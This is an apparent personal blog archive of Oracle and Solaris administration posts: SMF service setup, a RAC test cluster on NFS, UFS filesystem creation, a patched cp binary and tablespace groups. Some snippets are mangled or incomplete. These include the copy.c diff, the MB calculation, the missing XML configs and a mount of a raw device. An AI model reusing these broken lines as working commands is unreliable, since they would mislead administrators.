The mJoin operator is essentially an n-ary symmetric hash join operator. For each relation to be joined, a hash table is built on each join attribute. Then for each new tuple, it is inserted into the appropriate hash table(s) and a probe is performed into the hash tables on the other relations. Intermediate tuples are never stored anywhere. One of the issues we will be investigating in this experimental evaluation is whether an operator like the mJoin is more or less efficient than a tree of binary joins. Conventional wisdom says that a tree of binary joins is typically more efficient.

The first thing we will be doing in the next week or two is looking at various open-source databases and seeing which one would be most suited for us to work with for this project. Basically, the main criteria will be how easy the runtime engine is to work with and how easy it will be to add a new operator. We’ll have a look at a lot of databases but at the moment, its looking like Postgresql is the one we will work with for the semester. We’ll also be looking into any related work. The survey on adaptive query processing looks like a good starting point for this.

Some other interesting aspects of the mJoin operator which we hope to investigate are:

query optimization with the mJoin operator
what applications would benefit from an operator such as this
what kind of scenarios is the operator suited for (and not suited for)
how difficult it is to add the operator to an existing DBMS

I’ll try to post regularly throughout the semester on what we are up to and provide updates on what kind of progress we are making. In the meantime, besides working on this project, I’m trying to contribute to Drizzle in as many ways as I possibly can. I’m mostly working on small bugs and performing some code cleanup tasks.

Drizzle: A Pretty Cool Project

2009-01-28T00:00:00-08:00

Drizzle is a pretty cool project whose progress I've started following in the last few weeks. I'm trying to contribute in a tiny way if I can by confirming bug reports. If I had more time, I'd like to try resolving some bugs. Hopefully, I'll find some spare time to do that in the future.

I think its definitely a project worth keeping an eye on though. Check it out if you have the time.

What is Direct Data Placement

2009-01-06T00:00:00-08:00

I’m currently studying Oracle’s white paper on Exadata and came across the following paragraph:

“Further, Orace’s interconnect protocol uses direct data placement (DMA - direct memory access) to ensure very low CPU overhead by directly moving data from the wire to database buffers with no extra data copies being made.”

This got me wondering what direct data placement is. First off, the interconnect protocol which Oracle uses in Exadata is Reliable Datagram Sockets (RDSv3). The iDB (intelligent database protocol) that a database server and Exadata Storage Server software use to communicate is built on RDSv3.

Now, I found some information on direct data placement in a number of RFCs; RFC 4296, RFC 4297, and RFC 5041. Of the 3 RFCs, I found RFC 5041 (Direct Data Placement over Reliable Transports) to be the most relevant (although they are all worth a quick look). RFC 5041 sums up direct data placement quite nicely:

“Direct Data Placement Protocol (DDP) enables an Upper Layer Protocol (ULP) to send data to a Data Sink without requiring the Data Sink to Place the data in an intermediate buffer - thus, when the data arrives at the Data Sink, the network interface can place the data directly into the ULP’s buffer.”

The paragraph from Oracle’s white paper makes much more sense to me now after briefly reading through the RFC. Since each InfiniBand link in Exadata provides 16 Gb of bandwidth, there would be a large amount of overhead if data had to be placed in an intermediate buffer. Thus, the use of direct data placement makes perfect sense since it reduces CPU overhead associated with copying data through intermediate buffers.

Also, I believe that in the paragraph quoted from Oracle’s white paper, it should be RDMA for Remote DIrect Memory Access.

Semester Project Finally Finished

2008-12-16T00:00:00-08:00

We just finished our semester project yesterday for the class I am taking on High Performance Computing. It was a pretty interesting project based on the topic of software fault injection.

More details can be found in the project report here.

Configuring Oracle as a Service in SMF

2008-11-30T00:00:00-08:00

In Solaris 10, Sun introduced the Service Management Facility (SMF) to simplify management of system services. It is a component of the so called Predictive Self Healing technology available in Solaris 10. The other component is the Fault Management Architecture.
In this post, I will demonstrate how to configure an Oracle database and listener as services managed by SMF. This entails that Oracle will start automatically on boot which means we don't need to go to the bother of writing a startup script for Oracle (even though its not really that hard, see Howard Roger's 10gR2 installation guide on Solaris for an example). A traditional startup script could still be created and placed appropriate /etc/rc*.d directory. These scripts are referred to as legacy run services in Solaris 10 and will not benefit from the precise fault management provided by SMF.
In this post, I am only talking about a single instance environment and I am not using ASM for storage. Also please note that this post is not an extensive guide on how to do this by any means, it's just a short post on how to get it working. For more information on SMF and Solaris 10 in general, have a look through Sun's excellent online documentation at http://docs.sun.com.
Adding Oracle as a Service
To create a new service in SMF, a number of steps need to be performed (see the Solaris Service Management Facility - Service Developer Introduction for more details). Luckily for me, Joost Mulders has already done all the necessary work for performing this for Oracle. The package for installing ora-smf is available from here.
To install this package, download it to an appropriate location (in my case, the root user's home directory) and perform the following:

# cd /var/svc/manifest/application
# mkdir database
# cd ~
# pkgadd -d orasmf-1.5.pkg

There is now some configuration which needs to be performed. Navigate to the /var/svc/manifest/application/database directory. The following files will be present there

# ls -l
-r--r--r--   1 root     bin         2167 Apr 26 09:24 oracle-database-instance.xml
-r--r--r--   1 root     bin         5722 Dec 28  2005 oracle-database-service.xml
-r--r--r--   1 root     bin         2128 Apr 26 09:31 oracle-listener-instance.xml
-r--r--r--   1 root     bin         4295 Dec 28  2005 oracle-listener-service.xml
#

The two files which must be edited are:

oracle-database-instance.xml
oracle-listener-instance.xml

My oracle-database-instance.xml file looked like the following after I edited it according to my environment:

and my oracle-listener-instance.xml file looked like so after editing:

In the above configuration files, you can see that I have an instance (orcl1) whose ORACLE_HOME is /u01/app/oracle/product/10.2.0/db_1. I also have a resource project named oracle and the username and group which the Oracle software is installed as is oracle and dba respectively. The most important parameters which must be changed according to your environment are:

ORACLE_HOME
ORACLE_SID
User
Group
Project
Working Directory (in my case, I set it to the same value as ORACLE_HOME)
Instance name (needs to be the same as the ORACLE_SID for the database and the listener name for the listener)

Once these modifications have been performed according to your environment, execute the following to bring the database and listener under SMF control:

# svccfg import /var/svc/manifest/application/database/oracle-database-instance.xml
# svccfg import /var/svc/manifest/application/database/oracle-listener-instance.xml

Now, shut down the database and listener on the host (since this post presumes you are only configuring one database and listener, it shouldn't be too difficult to configure multiple instances though). Then execute the following to enable the database and listener as an SMF service and start the services:

# svcadm enable svc:/application/oracle/database:orcl1
# svcadm enable svc:/application/oracle/listener:LISTENER

In the commands above, the database instance is orcl1 and the listener name is LISTENER. Log of this process are available in the /var/svc/log directory.

# cd /var/svc/log
# ls -ltr application-*
-rw-r--r--   1 root     root          45 Apr 25 20:15 application-management-webmin:default.log
-rw-r--r--   1 root     root         120 Apr 25 20:15 application-print-server:default.log
-rw-r--r--   1 root     root          45 Apr 25 20:15 application-print-ipp-listener:default.log
-rw-r--r--   1 root     root          75 Apr 25 20:16 application-gdm2-login:default.log
-rw-r--r--   1 root     root         566 Apr 26 07:07 application-print-cleanup:default.log
-rw-r--r--   1 root     root         603 Apr 26 07:07 application-font-fc-cache:default.log
-rw-r--r--   1 root     root        3318 Apr 26 10:45 application-oracle-database:orcl1.log
-rw-r--r--   1 root     root        6847 Apr 26 10:47 application-oracle-listener:LISTENER.log
#

Testing Out SMF
Now, to test out some of the functionality of SMF, I'm going to kill the pmon process of the orcl1 database instance. SMF should automatically restart the instance.

# ps -ef | grep pmonoracle  
5113     1   0 10:19:22 ?           0:01 ora_pmon_orcl1
# kill -9 5113

Roughly 10 to 20 seconds later, the database came back up. Looking at the application-oracle-database:orcl1.log file, we can see what happened:

[ Apr 26 10:44:52 Stopping because process received fatal signal from outside the service. ]
[ Apr 26 10:44:52 Executing stop method ("/lib/svc/method/ora-smf stop database orcl1")]
**********************************************************************
********************************************************************** 
some of '^ora_(lgwr|dbw0|smon|pmon|reco|ckpt)_orcl1' died.
** Aborting instance orcl1.
*********************************************************************
*********************************************************************
ORACLE instance shut down.
[ Apr 26 10:44:53 Method "stop" exited with status 0 ]
[ Apr 26 10:44:53 Executing start method ("/lib/svc/method/ora-smf start database orcl1") ]
ORACLE instance started.
Total System Global Area  251658240 bytes
Fixed Size                  1279600 bytes
Variable Size              83888528 bytes
Database Buffers          163577856 bytes
Redo Buffers                2912256 bytes
Database mounted.
Database opened.
database orcl1 is OPEN.
[ Apr 26 10:45:05 Method "start" exited with status 0 ]

As can be seen from the content of my log file above, SMF discovered that the instance crashed and restarted it automatically. That seems pretty cool to me!
Now, let's try out the same procedure with the listener service.
Almost instantaneously, the listener came back up. Looking through the application-oracle-listener:LISTENER.log file shows us what SMF did:

[ Apr 26 10:47:50 Stopping because process received fatal signal from outside the service. ]
[ Apr 26 10:47:50 Executing stop method ("/lib/svc/method/ora-smf stop listener LISTENER") ]

LSNRCTL for Solaris: Version 10.2.0.2.0 - Production on 26-APR-2007 10:47:51

Copyright (c) 1991, 2005, Oracle.  All rights reserved.

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=solaris01)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC0)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
[ Apr 26 10:47:52 Method "stop" exited with status 0 ]
[ Apr 26 10:47:52 Executing start method ("/lib/svc/method/ora-smf start listener LISTENER") ]

LSNRCTL for Solaris: Version 10.2.0.2.0 - Production on 26-APR-2007 10:47:52

Copyright (c) 1991, 2005, Oracle.  All rights reserved.

Starting /u01/app/oracle/product/10.2.0/db_1/bin/tnslsnr: please wait...

TNSLSNR for Solaris: Version 10.2.0.2.0 - Production
System parameter file is /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
Log messages written to /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=solaris01)(PORT=1521)))
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC0)))

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=solaris01)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias                     LISTENER
Version                   TNSLSNR for Solaris: Version 10.2.0.2.0 - Production
Start Date                26-APR-2007 10:47:54
Uptime                    0 days 0 hr. 0 min. 0 sec
Trace Level               off
Security                  ON: Local OS Authentication
SNMP                      OFF
Listener Parameter File   /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
Listener Log File         /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=solaris01)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC0)))
Services Summary...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
The command completed successfully
listener LISTENER start succeeded
[ Apr 26 10:47:54 Method "start" exited with status 0 ]

I havn't really played around too much else with SMF and Oracle at the moment. Obviously, Oracle has a lot of this functionality already available through Enterprise Manager using corrective actions.
Also, its worth pointing out that Oracle does not currently support SMF and does not provide any information or documentation on configuring Oracle with SMF. Metalink Note 398580.1 and Bug 5340239 have more information on this from Oracle.

srvctl Error in Solaris 10 RAC Environment

2008-11-29T00:00:00-08:00

If you install a RAC environment on Solaris 10 and set kernel parameters using resource control projects (which is the recommended method in Solaris 10), then you will likely encounter issues when trying to start the cluster database or an individual instance using the srvctl utility. As an example, this is likely what you will encounter:

$ srvctl start instance -d orclrac -i orclrac2
PRKP-1001 : Error starting instance orclrac2 on node nap-rac02
CRS-0215: Could not start resource 'ora.orclrac.orclrac2.inst'.
$

along with the following messages in the alert log

Tue Apr 24 11:36:21 2007
Starting ORACLE instance (normal)
Tue Apr 24 11:36:21 2007
WARNING: EINVAL creating segment of size 0x0000000024802000
fix shm parameters in /etc/system or equivalent

This is because the srvctl utility is unable to get the correct shared memory related settings using prctl as it reads the settings from the /etc/system file. This is documented in bug 5340239 on Metalink.

The only workaround for this at the moment (that I know of) is to manually add the necessary shm parameters to the /etc/system file, for example:

set semsys:seminfo_semmni=100
set semsys:seminfo_semmsl=256
set shmsys:shminfo_shmmax=4294967295
set shmsys:shminfo_shmmni=100

Oracle 10gR2 RAC with Solaris 10 and NFS

2008-11-29T00:00:00-08:00

Recently, I setup a 2 node RAC environment for testing using Solaris 10 and NFS. This environment consisted of 2 RAC nodes running Solaris 10 and a Solaris 10 server which served as my NFS filer.
I thought it might prove useful to create a post on how this is achieved as I found it to be a relatively quick way to setup a cheap test RAC environment. Obviously, this setup is not supported by Oracle and should only be used for development and testing purposes.
This post will only detail the steps which are specific to this setup; meaning I wont talk about a number of steps which need to be performed such as setting up user equivalence and creating the database. I will mention when these steps should be performed but I point you to Jeffrey Hunter's article on building a 10gR2 RAC on Linux with iSCSI for more information on steps like this.

Overview of the Environment

Here is a diagram of the architecture used which is based on Jeff Hunter's diagram from the previously mentioned article (click on the image to get a larger view):

You can see that I am using an external hard drive attached to the NFS filer for storage. This external hard drive will hold all my database and Clusterware files.
Again, the hardware used is the exact same as the hardware used in Jeff Hunter's article. Notice however that I do not have a public interface configured for my NFS filer. This is mainly because I did not have any spare network interfaces lying around for me to use!

Getting Started

To get started, we will install Solaris 10 for the x86 architecture on all three machines. The ISO images for Solaris 10 x86 can be downloaded from Sun's website here. You will need a Sun Online account to access the downloads but registration is free and painless.
I won't be covering the Solaris 10 installation process here but for more information, I refer you to the official Sun basic installation guide found here.
When installing Solaris 10, make sure that you configure both network interfaces. Ensure that you do not use DHCP for either network interface and specify all the necessary details for your environment.
After installation, you should update the /etc/inet/hosts file on all hosts. For my environment as shown in the diagram above, my hosts file looked like the following:

#
# Internet host table
#
127.0.0.1 localhost

# Public Network - (pcn0)
172.16.16.27 solaris1
172.16.16.28 solaris2

# Private Interconnect - (pcn1)
192.168.2.111 solaris1-priv
192.168.2.112 solaris2-priv

# Public Virtual IP (VIP) addresses for - (pcn0)
172.16.16.31 solaris1-vip
172.16.16.32 solaris2-vip

# NFS Filer - (pcn1)
192.168.2.195 solaris-filer

The network settings on the RAC nodes will need to be adjusted as they can affect cluster interconnect transmissions. The UDP parameters which need to be modified on Solaris are udp_recv_hiwat and udp_xmit_hiwat. The default values for these parameters on Solaris 10 are 57344 bytes. Oracle recommends that these parameters are set to at least 65536 bytes.
To see what these parameters are currently set to, perform the following:

# ndd /dev/udp udp_xmit_hiwat
57344
# ndd /dev/udp udp_recv_hiwat
57344

To set the values of these parameters to 65536 bytes in current memory, perform the following:

# ndd -set /dev/udp udp_xmit_hiwat 65536
# ndd -set /dev/udp udp_recv_hiwat 65536

Now we obviously want these parameters to be set to these values when the system boots. The official Oracle documentation is incorrect when it states that the parameters are set on boot when they are placed in the /etc/system file. The values placed in /etc/system will have no affect on Solaris 10. Bug 5237047 has more information on this.
So what we will do is to create a startup script called udp_rac in /etc/init.d. This script will have the following contents:

#!/sbin/sh
case "$1" in
'start')
ndd -set /dev/udp udp_xmit_hiwat 65536
ndd -set /dev/udp udp_recv_hiwat 65536
;;
'state')
ndd /dev/udp udp_xmit_hiwat
ndd /dev/udp udp_recv_hiwat
;;
*)
echo "Usage: $0 { start | state }"
exit 1
;;
esac

Now, we need to create a link to this script in the /etc/rc3.d directory:

# ln -s /etc/init.d/udp_rac /etc/rc3.d/S86udp_rac

Configuring the NFS Filer

Now that we have Solaris installed on all our machines, its time to start configuring our NFS filer. As I mentioned before, I will be using an external hard drive for storing all my database files and Clusterware files. If you're not using an external hard drive you can ignore the next paragraph.
In my previous post, I talked about creating a UFS file system on an external hard drive in Solaris 10. I am going to be following that post exactly. So if you perform what I mention in that post, you will have a UFS file system ready for mounting.
Now, I have a UFS file system created on the /dev/dsk/c2t0d0s0 device. I will create a directory for mounting this file system and then mount it:

# mkdir -p /export/rac
# mount -F ufs /dev/dsk/c2t0d0s0 /export/rac

Now that we have created the base directory, lets create directories inside this which will contain the various files for our RAC environment.

# cd /export/rac
# mkdir crs_files
# mkdir oradata

The /export/rac/crs_files directory will contain the OCR and the voting disk files used by Oracle Clusterware. The /export/rac/oradata directory will contain all the Oracle data files, control files, redo logs and archive logs for the cluster database.
Obviously, this setup is not ideal since everything is on the same device. For setting up this environment, I didn't care. All I wanted to do was get a quick RAC environment up and running and show how easily it can be done with NFS. More care should be taken in the previous step but I'm lazy...
Now we need to make these directories accessible to the Oracle RAC nodes. I will be accomplishing this using NFS. We first need to edit the /etc/dfs/dfstab file to specify which directories we want to share and what options we want to use when sharing them. The dfstab file I configured looked like so:

#       Place share(1M) commands here for automatic execution
#       on entering init state 3.
#
#       Issue the command 'svcadm enable network/nfs/server' to
#       run the NFS daemon processes and the share commands, after adding
#       the very first entry to this file.
#
#       share [-F fstype] [ -o options] [-d ""]  [resource]
#       .e.g,
#       share  -F nfs  -o rw=engineering  -d "home dirs"  /export/home2
share -F nfs -o rw,anon=175 /export/rac/crs_files
share -F nfs -o rw,anon=175 /export/rac/oradata

The anon option in the dfstab file as shown above, is the user ID of the oracle user on the cluster nodes. This user ID should be the same on all nodes in the cluster.
After editing the dfstab file, the NFS daemon process needs to be restarted. You can do this on Solaris 10 like so:

# svcadm restart nfs/server

To check if the directories are exported correctly, the following can be performed from the NFS filer:

# share
-               /export/rac/crs_files   rw,anon=175   ""
-               /export/rac/oradata     rw,anon=175   ""
#

The specified directories should now be accessible from the Oracle RAC nodes. To verify that these directories are accessible from the RAC nodes, run the following from both nodes (solaris1 and solaris2 in my case):

# dfshares solaris-filer
RESOURCE                                  SERVER ACCESS    TRANSPORT
solaris-filer:/export/rac/crs_files    solaris-filer  -         -
solaris-filer:/export/rac/oradata      solaris-filer  -         -
#

The output should be the same on both nodes.

Configure NFS Exports on Oracle RAC Nodes

Now we need to configure the NFS exports on the two nodes in the cluster. First, we must create directories where we will be mounting the exports. In my case, I did this:

# mkdir /u02
# mkdir /u03

I am not using u01 as I'm using this directory for installing the software. I will not be configuring a shared Oracle home in this article as I wanted to keep things as simple as possible but that might serve as a good future blog post.
For mounting the NFS exports, there are specific mount options which must be used with NFS in an Oracle RAC environment. The mount command which I used to manually mount these exports is as follows:

# mount -F nfs -o rw,hard,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3 \
solaris-filer:/export/rac/crs_files /u02
# mount -F nfs -o rw,hard,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3 \
solaris-filer:/export/rac/oradata /u03

Obviously, we want these exports to be mounted at boot. This is accomplished by adding the necessary lines to the /etc/vfstab file. The extra lines which I added to the /etc/vfstab file on both nodes were (the output below did not come out very well originally so I had to split each line into 2 lines):

solaris-filer:/export/rac/crs_files   -   /u02   nfs   -   yes
rw,hard,bg,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3
solaris-filer:/export/rac/oradata     -   /u03   nfs   -   yes
rw,hard,bg,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3

Configure the Solaris Servers for Oracle

Now that we have shared storage setup, it's time to configure the Solaris servers on which we will be installing Oracle. One little thing which must be performed on Solaris is to create symbolic links for the SSH binaries. The Oracle Universal Installer and configuration assistants (such as NETCA) will look for the SSH binaries in the wrong location on Solaris. Even if the SSH binaries are included in your path when you start these programs, they will still look for the binaries in the wrong location. On Solaris, the SSH binaries are located in the /usr/bin directory by default. The OUI will throw an error stating that it cannot find the ssh or scp binaries. My simple workaround was to simply create a symbolic link in the /usr/local/bin directory for these binaries.

# ln -s /usr/bin/ssh /usr/local/bin/ssh
# ln -s /usr/bin/scp /usr/local/bin/scp

You should also create the oracle user and directories now before configuring kernel parameters.
For configuring and setting kernel parameters on Solaris 10 for Oracle, I point you to this excellent installation guide for Oracle on Solaris 10 by Howard Rogers. It contains all the necessary information you need for configuring your Solaris 10 system for Oracle. Just remember to perform all steps mentioned in his article on both nodes in the cluster.

What's Left to Do

From here on in, its quite easy to follow Jeff Hunter's article. Obviously, you wont be using ASM. The only differences between what to do now and what he has documented is file locations. So you could follow along from section 14 and you should be able to get a 10gR2 RAC environment up and running. Obviously, there is some sections such as setting up OCFS2 and ASMLib that can be left out since we are installing on Solaris and not Linux.

Creating a UFS File System on an External Hard Drive with Solaris 10

2008-11-29T00:00:00-08:00

Recently, I wanted to create a UFS file system on a Maxtor OneTouch II external hard drive I have. I wanted to use the external hard drive for storing some large files and I was going to use the drive exclusively with one of my Solaris systems. Now, I didn’t find much information on the web about how to perform this with Solaris (maybe I wasn’t searching very well or something) so I thought I would post the procedure I followed here so I’ll know how to do it again if I need to.

After plugging the hard drive into my system via one of the USB ports, we can verify that the disk was recognized by the OS by examining the /var/adm/messages file. With the hard drive I was using, I saw entries like the following:

Mar  2 13:10:33 solaris-filer usba: [ID 912658 kern.info] USB 2.0 device (usbd49,7100) 
operating at hi speed (USB 2.x) on USB 2.0 root hub: storage@3, scsa2usb0 at bus address 2
Mar  2 13:10:33 solaris-filer usba: [ID 349649 kern.info]       Maxtor OneTouch II L60LHYQG
Mar  2 13:10:33 solaris-filer genunix: [ID 936769 kern.info] scsa2usb0 is /pci@0,0/pci1028,11d@1d,7/storage@3
Mar  2 13:10:33 solaris-filer genunix: [ID 408114 kern.info] /pci@0,0/pci1028,11d@1d,7/storage@3 
(scsa2usb0) online
Mar  2 13:10:33 solaris-filer scsi: [ID 193665 kern.info] sd1 at scsa2usb0: target 0 lun 0

The dmesg command could also be used to see similar information. Also, we could use the rmformat command (this lists removable media) to see this information in a much nicer format like so:

# rmformat -l
Looking for devices...
   1. Logical Node: /dev/rdsk/c1t0d0p0
      Physical Node: /pci@0,0/pci-ide@1f,1/ide@1/sd@0,0
      Connected Device: QSI      CDRW/DVD SBW242U UD25
      Device Type: DVD Reader
   2. Logical Node: /dev/rdsk/c2t0d0p0
      Physical Node: /pci@0,0/pci1028,11d@1d,7/storage@3/disk@0,0
      Connected Device: Maxtor   OneTouch II      023g
      Device Type: Removable
#

Now that we now the drive has been identified by Solaris (as /dev/rdsk/c2t0d0p0) we need to create one Solaris partition (this is Solaris 10 running on the x86 architecture) that uses the whole disk. This accomplished by passing the -B flag to the fdisk command, like so:

# fdisk -B /dev/rdsk/c2t0d0p0

Now we will print the disk table to standard out like so:

# fdisk -W - /dev/rdsk/c2t0d0p0

This will output the following information to the screen for the hard drive I am using:

* /dev/rdsk/c2t0d0p0 default fdisk table
* Dimensions:
*    512 bytes/sector
*     63 sectors/track
*    255 tracks/cylinder
*   36483 cylinders
*
* systid:
*    1: DOSOS12
*    2: PCIXOS
*    4: DOSOS16
*    5: EXTDOS
*    6: DOSBIG
*    7: FDISK_IFS
*    8: FDISK_AIXBOOT
*    9: FDISK_AIXDATA
*   10: FDISK_0S2BOOT
*   11: FDISK_WINDOWS
*   12: FDISK_EXT_WIN
*   14: FDISK_FAT95
*   15: FDISK_EXTLBA
*   18: DIAGPART
*   65: FDISK_LINUX
*   82: FDISK_CPM
*   86: DOSDATA
*   98: OTHEROS
*   99: UNIXOS
*  101: FDISK_NOVELL3
*  119: FDISK_QNX4
*  120: FDISK_QNX42
*  121: FDISK_QNX43
*  130: SUNIXOS
*  131: FDISK_LINUXNAT
*  134: FDISK_NTFSVOL1
*  135: FDISK_NTFSVOL2
*  165: FDISK_BSD
*  167: FDISK_NEXTSTEP
*  183: FDISK_BSDIFS
*  184: FDISK_BSDISWAP
*  190: X86BOOT
*  191: SUNIXOS2
*  238: EFI_PMBR
*  239: EFI_FS
*

* Id    Act  Bhead  Bsect  Bcyl    Ehead  Esect  Ecyl    Rsect    Numsect
191   128  0      1      1       254    63     1023    16065    586083330

We now need to calculate the maximum amount of usable storage. This is done by multiplying bytes/sectors (512 in my case) by the number of sectors listed at the bottom of the output shown above. We then divide this number by 10241024 to yield MBs.

So in my case, this will work out as 286173.5009765625 MB.

Now, we need to setup a partition table file. This will be a regular text file and you can name it whatever you like. For the sake of this post, I will name it disk_slices.txt. The contents of this file are:

slices: 0 = 2MB, 286170MB, "wm", "root" :
      1 = 0, 1MB, "wu", "boot" :
      2 = 0, 286172MB, "wm", "backup"

To create these slices on the disk, we run:

# rmformat -s disk_slices.txt /dev/rdsk/c2t0d0p0
# devfsadm
# devfsadm -C

To create the UFS file system on the newly created slice, I run the following and the output from running this command is also shown:

# newfs /dev/rdsk/c2t0d0s0
newfs: construct a new file system /dev/rdsk/c2t0d0s0: (y/n)? y
/dev/rdsk/c2t0d0s0:     586076160 sectors in 95390 cylinders of 48 tracks, 128 sectors
      286170.0MB in 5962 cyl groups (16 c/g, 48.00MB/g, 5824 i/g)
super-block backups (for fsck -F ufs -o b=#) at:
32, 98464, 196896, 295328, 393760, 492192, 590624, 689056, 787488, 885920,
Initializing cylinder groups:
...............................................................................
........................................
super-block backups for last 10 cylinder groups at:
585105440, 585203872, 585302304, 585400736, 585499168, 585597600, 585696032,
585794464, 585892896, 585991328
#

And now I’m finished, I now have a UFS file system created on my USB hard drive which can be mounted by my Solaris system. To mount this file system, I can just:

# mount -F ufs /dev/rdsk/c2t0d0p0 /u01

Building a Modified cp Binary on Solaris 10

2008-11-29T00:00:00-08:00

I thought I would write a post on how I setup my Solaris 10 system to build an improved version of the stock cp(1) utility that comes with Solaris 10 in case anyone arrives here from Kevin Closson’s blog. If you are looking for more background information on why I am performing this modification, have a look at this post by Kevin Closson.

GNU Core Utilities

We need to download the source code for the cp utility that we will be modifying. This source code is available as part of the GNU Core Utilities.

Coreutils 5.2.1

Down the software to an appropriate location on your system.

Modifying the Code

Untar the code first on your system.

# gunzip coreutils-5.2.1.tar.gz
# tar xvf coreutils-5.2.1.tar

Proceed to the coreutils-5.2.1/src directory. Open the copy.c file with an editor. The following are the differences between the modified copy.c file and the original copy.c file:

# diff -b copy.c.orig copy.c
287c315
< buf_size =" ST_BLKSIZE">   /* buf_size = ST_BLKSIZE (sb);*/

288a317,319
>
>      buf_size = 8388608 ;
>

Building the Binary

To build the modified cp binary, navigate first to the coreutils-5.2.1 directory. Then enter the following (ensure that the gcc binary is in your PATH first; it is located at /usr/sfw/bin/):

# ./configure
# /usr/ccs/bin/make

We don’t want to do make install as is the usual when building something from source like this as it would replace the stock cp(1) utility. Instead, we will copy the cp binary located in the coreutils-5.2.1/src directory like so:

# cp coreutils-5.2.1/src/cp /usr/bin/cp8m

Results of using the Modified cp

See Kevin Closson's post on copying files on Solaris for some in-depth discussion of this topic and more information on the reasoning behind making this modification to the cp(1) utility.

White Paper at Oracle OpenWorld

2008-11-25T00:00:00-08:00

A white paper that I was part of writing is being presented at Oracle OpenWorld this week. The paper is entitled ‘High Availability Options for the Oracle Database’. It is being presented by Dan Norris and I wrote the sections on Export/Import and data pump. The paper is available for download from the IT Convergence website here.

Dan is kinda like my mentor here at IT Convergence. He has a lot of knowledge and experience with Oracle especially with RAC and is quite well known in the Oracle community.

At the moment, I’ve been working on setting up a cheap 10g RAC environment in the office for testing and educational purposes. The RAC is up and running now. I followed this excellent article by Jeffrey Hunter on setting up a RAC environment with a budget!

OCFS2 would not play nice for me though so I decided to use RAW devices instead of OCFS like Mr. Hunter did in his article. Besides that though, I pretty much followed his article and was able to get my 10g RAC up and running (after a small bit of hassle with the Oracle firewire modules!).

Temporary Tablespace Groups

2008-11-25T00:00:00-08:00

Temporary tablespace groups are a new feature introduced in Oracle10g. A temporary tablespace group is a list of tablespaces and is implicitly created when the first temporary tablespace is created. Its members can only be temporary tablespaces.

You can specify a tablespace group name wherever a tablespace name would appear when you assign a default temporary tablespace for the database or a temporary tablespace for a user. Using a tablespace group, rather than a single temporary tablespace, can alleviate problems caused where one tablespace is inadequate to hold the results of a sort, particularly on a table that has many partitions. A tablespace group enables parallel execution servers in a single parallel operation to use multiple temporary tablespaces.

Group Creation

You do not explicitly create a tablespace group. Rather, it is created implicitly when you assign the first temporary tablespace to the group. The group is deleted when the last temporary tablespace it contains is removed from it.

SQL> CREATE TEMPORARY TABLESPACE temp_test_1 2 TEMPFILE '/oracle/oracle/oradata/orclpad/temp_test_1.tmp' 3 SIZE 100 M 4 TABLESPACE GROUP temp_group_1;Tablespace created.SQL>

If the group temp_group_1 did not already exist, it would be created at this time. Now we will create a temporary tablespace but will not add it to the group.

SQL> CREATE TEMPORARY TABLESPACE temp_test_2 2 TEMPFILE '/oracle/oracle/oradata/orclpad/temp_test_2.tmp' 3 SIZE 100 M 4 TABLESPACE GROUP '';Tablespace created.SQL>

Now we will alter this tablespace and add it to a group.

SQL> ALTER TABLESPACE temp_test_2 2 TABLESPACE GROUP temp_group_1;Tablespace altered.SQL>

To de-assign a temporary tablespace from a group, we issue an ALTER TABLESPACE command as so:

SQL> ALTER TABLESPACE temp_test_2 2 TABLESPACE GROUP '';Tablespace altered.SQL>Assign Users to Temporary Tablespace Groups

In this example, we will assign the user SCOTT to the temporary tablespace group temp_group_1.

SQL> ALTER USER scott 2 TEMPORARY TABLESPACE temp_group_1;User altered.SQL>

Now when we query the DBA_USERS view to see SCOTT’s default temporary tablespace, we will see that the group is his temporary tablespace now. SQL> SELECT username, temporary_tablespace 2 FROM DBA_USERS 3 WHERE username = 'SCOTT';

USERNAME TEMPORARY_TABLESPACE-------- ------------------------------SCOTT TEMP_GROUP_1SQL>Data Dictionary Views

To view a temporary tablespace group and it smembers we can view the DBA_TABLESPACE_GROUPS data dictionary view.

SQL> SELECT * FROM DBA_TABLESPACE_GROUPS;GROUP_NAME TABLESPACE_NAME------------ ------------------------------TEMP_GROUP_1 TEMP_TEST_1TEMP_GROUP_1 TEMP_TEST_2SQL>Advantages of Temporary Tablespace Groups

Allows multiple default temporary tablespaces
A single SQL operation can use muultiple temporary tablespaces for sorting
Rather than have all temporary I/O go against a single temporary tablespace, the database can distribute that I/O load among all the temporary tablespaces in the group.
If you perform an operation in parallel, child sessions in that parallel operation are able to use multiple tablespaces.

Playing with Swingbench

2008-11-25T00:00:00-08:00

SwingbenchA Note About the Environment Used for Testing

Before we delve into using Swingbench, I thought I should mention a little about the environment used for testing as it affects the results a lot! The box used to run the database in this post is a Dell Latitude D810 laptop with a 2.13 GHz processor and 1GB of RAM. It is running on Solaris 10, specifically the 11/06 release. The datafiles and redo log files are stored on a Maxtor OneTouch II external hard drive connected via a USB 2.0 interface.

The datafiles for the database reside on a 80 GB partition which is formatted with a UFS filesystem and the redo logs reside on a 20 GB partition which is also formatted with a UFS filesystem. The database is not running in archive log mode and there is no flash recovery area configured.

Enabling Direct I/O

